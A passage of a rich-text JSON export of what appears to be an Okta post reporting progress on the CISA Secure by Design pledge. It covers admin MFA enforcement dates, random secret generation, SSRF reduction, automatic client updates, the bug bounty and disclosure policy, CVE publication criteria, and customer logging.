devices.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Since February 2024, FIDO2 passkeys have been a first-class factor in the Auth0 platform, providing customers an ability to offer a new primary authenticator to replace passwords in consumer-facing apps and websites.\",\"marks\":[],\"data\":{}}]}]}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Over the past 18 months, Okta has made several commitments that drive strong MFA adoption: \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/2023/08/byo-telephony-and-future-sms-okta\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"no longer offers SMS as a default MFA method\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" in new Okta Platform tenants, in an effort to encourage customers to embrace stronger sign-in flows.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta no longer allows administrators to create single-factor authentication policies for access to the Okta Admin Console or Auth0 Management Console. \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Customer administrators now require MFA for access to the Okta Help Center, a service desk/support application for the Okta Platform.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Target State\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta’s goal is to enforce MFA for all administrative access to internet-facing services within the term of the Secure by Design pledge. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The MFA enforcement program for the Okta Admin Console commenced in September 2024 and is scheduled for completion by March 2025. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This program is complex and staged to support the different mechanisms Okta customers use to access privileged accounts, including the use of federated identity providers and privileged access management solutions.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-header-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Date\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-header-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Enforcement\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"August 2024 \\n*\",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Complete*\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Administrators can no longer create single-factor authentication policies for access to the Okta Admin Console, and have been notified of schedule for MFA enforcement.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"September 2024\\n\",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"*Complete*\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"MFA required for access to the Okta Admin Console on production tenants.\\n\\nTemporary exemptions for tenants that: (a) do not allow inline MFA enrolment, (b) Use inbound federation or (c) Use PAM solutions to access the Okta Admin Console\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"November 2024\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"MFA required for access to the Okta Admin Console on production tenants, removing exemptions for tenants that do not allow inline MFA enrolment.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"January 2025\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"MFA required for access to the Okta Admin Console in developer tenants used for building third-party integrations.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"March 2025\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"MFA required for all access to the Okta Admin Console, using AMR claims mapping to account for federated use cases and PAM solutions.\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta’s longer term goal is to drive adoption of passwordless, phishing-resistant authentication for all administrative access. This method of sign-in dramatically reduces exposure to the most common forms of identity-based attacks. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Current initiatives include:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In-app notifications that nudge administrators signed in to the Okta Admin Console to enrol in phishing resistant factors.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Dashboards in the Admin Console that help customers track adoption of phishing resistant authentication. \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Updates to the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/resources/whitepaper-the-secure-sign-in-trends-report/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Secure SignIn Trends report\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", which tracks the rate of phishing resistant adoption for administrators and end users.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Our other major initiative is the launch of additional features that extend phishing resistance across the user lifecycle, from enrolment through to authentication and recovery. These include \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/identity-engine/authenticators/onboard-with-preenrolled-yubikey.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"pre-enrolled FIDO2 security keys\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" to secure user onboarding as well as \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/security/idp-idv.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Identity Verification integrations\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" that can be used to verify user identities using government-issued documents. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"2. Reduce the use of default passwords\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"blockquote\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Within one year of signing the pledge, demonstrate measurable progress towards\\nreducing default passwords across the manufacturers’ products.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Current State\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Default passwords present avoidable security risks.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"All secrets generated in Okta cloud services are randomly generated. This includes customer tenant encryption keys, client secrets or JWK key pairs for application integrations, temporary user passwords and API keys. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Where on-premise appliances, clients or agents require default credentials at installation, Okta enforces rotation of these credentials at first sign-in to the administrative console. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Target State\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"There are no immediate changes required.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"3. Reduce common classes of vulnerabilities\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"blockquote\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Within one year of signing the pledge, demonstrate actions taken towards enabling a significant measurable reduction in the prevalence of one or more vulnerability classes across the manufacturer’s products.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Current State\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta’s Product Security team performs security testing on all Okta products and triages vulnerability reports submitted by third parties.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In the interests of continual improvement, the team conducts large-scale studies of vulnerabilities reported across the Workforce and Customer Identity Clouds. Our latest study normalized this data against the Bugcrowd \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://bugcrowd.com/vulnerability-rating-taxonomy\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Vulnerability Rating Taxonomy (VRT)\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" to generate trending metrics on critical and high vulnerabilities reported over time.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The Okta Product Security team uses the output from this analysis to make decisions about the tools, processes and campaigns required to address the most common root causes of vulnerabilities. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The Okta Security Education capability within this team uses the findings, for example, to develop focus areas in training and awareness campaigns. The Okta Security Reviews team, meanwhile, are intermittently tasked with a “deep review” of a recurring bug class and make recommendations on how to prevent its occurrence across large numbers of development teams. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This feedback loop has resulted in near eradication of a number of classes of vulnerabilities in Okta products. One example is \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://owasp.org/www-community/attacks/Server_Side_Request_Forgery\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Server Side Request Forgery\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". After multiple deep reviews, Okta’s Security Engineering function re-wrote an SSRF protection mechanism in 2020. Over the three years since, the number of SSRF bugs discovered has declined by an annual average of 47%. We have not (knock on wood) discovered or responded to any SSRF bugs in the Workforce Identity Cloud in 2024.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Target State\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Security now hopes to repeat this success with other vulnerabilities in the same category. Okta Product Security plans to initiate a campaign to drive down exposure to all vulnerabilities classed as Server Security Misconfigurations in the Bugcrowd VRT. The Server Security Misconfigurations category refers to 70+ vulnerability types. Many are troublesome because they tend to be difficult to discover or test for. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We are currently in the planning phase, which will result in a target metric, development of a dashboard, and a range of actions, such as:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Standardizing vulnerability categorization across product units, \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Deep Reviews to discover any additional evidence of this vulnerability across Okta’s product portfolio,\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Updating Okta’s Secure Coding Guidelines to focus on this class of vulnerability,\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Education campaigns and champions program initiatives that target specific engineering teams, \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Hunting for repetitive patterns that could be automatically detected using scanners, and\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Development and advocacy for preferred libraries or recommended “secure by default” values.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We will provide an update on our results at the end of year one of the pledge.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"4. Drive improved customer patching hygiene\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"blockquote\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Within one year of signing the pledge, demonstrate actions taken to measurably\\nincrease the installation of security patches by customers.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Current State\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta is committed to making it easy for customers to maintain up-to-date versions of client software, where it is required. We facilitate and encourage the ability for customers to automatically update client software without human intervention. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Workforce Identity Cloud customers can configure automatic installation of updates for Active Directory Agents and LDAP Agents that synchronize with on-premise identity services. The Okta Verify client on Windows can also be configured for automatic updates. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Automatic updates remain optional, as many enterprise organizations prefer to test updates before they are applied in production. We offer customers the option of \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/identity-engine/devices/ov-autoupdate-windows.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"deferring or disabling automatic Okta Verify updates\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Even in cases where customers have chosen to defer or disable automatic updates of clients, Okta notifies customers where a version of a client they are running is found to be vulnerable to a new attack. Okta registers vulnerability information with the national vulnerability database as a CVE and proactively identifies and contacts potentially impacted customers.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Administrators can check whether they are running the latest version of any given agent via notifications in the Admin Console. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The Okta Verify client can be configured by administrators to automatically update on Android, iOS or MacOS using solutions from Okta’s \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/identity-engine/devices/managed-main.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Device Management partners\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". Users can auto-update the Okta Verify client or the Auth0 Guardian client downloaded from the Apple or Google app stores. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Target State\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta is committed to delivering automatic updates on supported platforms. Our next goal is to ensure that no customer is left behind due to a lack of information or context about what software needs to be updated. We are exploring ways to elevate reminders about pending updates to more prominent positions in our administrative consoles - such as creating new task list items or “inbox” notifications.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"5. Publish a Vulnerability Disclosure Policy\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"blockquote\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Within one year of signing the pledge, publish a vulnerability disclosure policy (VDP) that authorizes testing by members of the public on products offered by the manufacturer, commits to not recommending or pursuing legal action against anyone engaging in good faith efforts to follow the VDP, provides a clear channel to report vulnerabilities, and allows for public disclosure of vulnerabilities in line with coordinated vulnerability disclosure best practices and international standards. \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Current State\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta is committed to providing opportunities for independent security researchers, customer red teams and other interested parties to discover and responsibly disclose vulnerabilities in our platforms.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta has a long-standing \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/vulnerability-reporting-policy\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"published Vulnerability Disclosure Policy\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" and has maintained public bug bounty programs since 2016. Today Okta’s public bug bounty program includes the Auth0 platform, and most products in the Okta platform (including Okta Privileged Access, Okta Workflows, Okta Access Requests, Okta Device Access, Advanced Server Access, the Okta support portal as well as client software including Okta Verify clients, Okta directory agents and the Okta browser plugin). \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta has provided financial rewards for over 400 issues submitted to the public bug bounty program since its inception, and paid out over US$440,000 in rewards.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Target State\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta aims to maintain 100% coverage of all Okta products in our bug bounty programs. To achieve this goal, Okta recently added Okta Access Gateway and Okta Personal to a private bug bounty program, and promoted the Auth0 Platform from the private program into Okta’s public bug bounty program. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta is committed to adding new products to these bug bounty programs into the future.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"6. Provide transparency on vulnerabilities\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"blockquote\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Within one year of signing the pledge, demonstrate transparency in vulnerability\\nreporting by including accurate Common Weakness Enumeration (CWE) and Common\\nPlatform Enumeration (CPE) fields in every Common Vulnerabilities and Exposures (CVE)\\nrecord for the manufacturer’s products. Additionally, issue CVEs in a timely manner for, at\\nminimum, all critical or high impact vulnerabilities that either require actions by a customer to patch or have evidence of active exploitation.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Current State\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta addresses vulnerabilities discovered in Okta software and services in accordance with the contractual terms entered into with customers.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Further, Okta has published CVEs when a vulnerability discovered in an Okta component requires action on the part of an Okta customer. Okta is a CVE Numbering Authority (CNA) authorized by CISA and MITRE to publish vulnerability information as CVE (Common Vulnerabilities and Exposures) bulletins. CVE bulletins for customer-installed Okta clients and agents are published at \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"http://trust.okta.com/security-advisories/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"trust.okta.com/security-advisories/\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Target State\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta commits to also publishing CVE bulletins for vulnerabilities where they meet the following conditions:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta customers are required to apply a security update to mitigate the risk, or\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In the absence of a security update, Okta Security is aware of reliable workarounds or other mitigating actions a customer could take using third-party tools to address the risk posed by a vulnerability, or\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The vulnerability is subject to active exploitation in attacks on one or more Okta customers.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This approach balances the legitimate interests of Okta customers in understanding their exposure to risk, while protecting them from unnecessary risks and reducing the “ticket fatigue” burden that would be imposed if customer teams were held to account for risks they have no agency to mitigate. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We recognize that this approach will result in some vulnerabilities never reaching the public domain, limiting opportunities for other parties to derive lessons from these bugs. With this in mind, Okta commits to providing greater transparency about vulnerabilities addressed in Okta services, where those methods of disclosure no longer impose risks for our customers. Okta recently published, for example, \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/fastpasshardening\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"this short history\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" of research into abuse of the Okta FastPass client as one approach to demonstrating this transparency, and presented on the same subject at Oktane 2024 in Las Vegas.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"What is more important, in the eyes of many customers, is how we get the right security information into the hands of the right customer stakeholders in a timely fashion. Okta is committed to improving our methods of disclosing security-relevant information to customers. If you’re an Okta customer and haven’t provided your CISO/CIO and Security contacts to your Okta account representative, there is no time like the present!\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"7. Deliver improved logging and monitoring for customers\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"blockquote\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Within one year of signing the pledge, demonstrate a measurable increase in the\\nability for customers to gather evidence of cybersecurity intrusions affecting the\\nmanufacturer’s products.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Current State\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"All Okta products provide mechanisms for administrators to troubleshoot access issues and for security teams to monitor for suspicious activity. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"At minimum, logged events include authentication and application access events, administrator and user actions, session context, and information on the source and target of an action. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Logged events are typically available in administrative consoles and programmatically via APIs and log streaming (see table below). \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-header-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\\n\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-header-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The Okta Platform \",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-header-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The Auth0 Platform\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-header-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Access 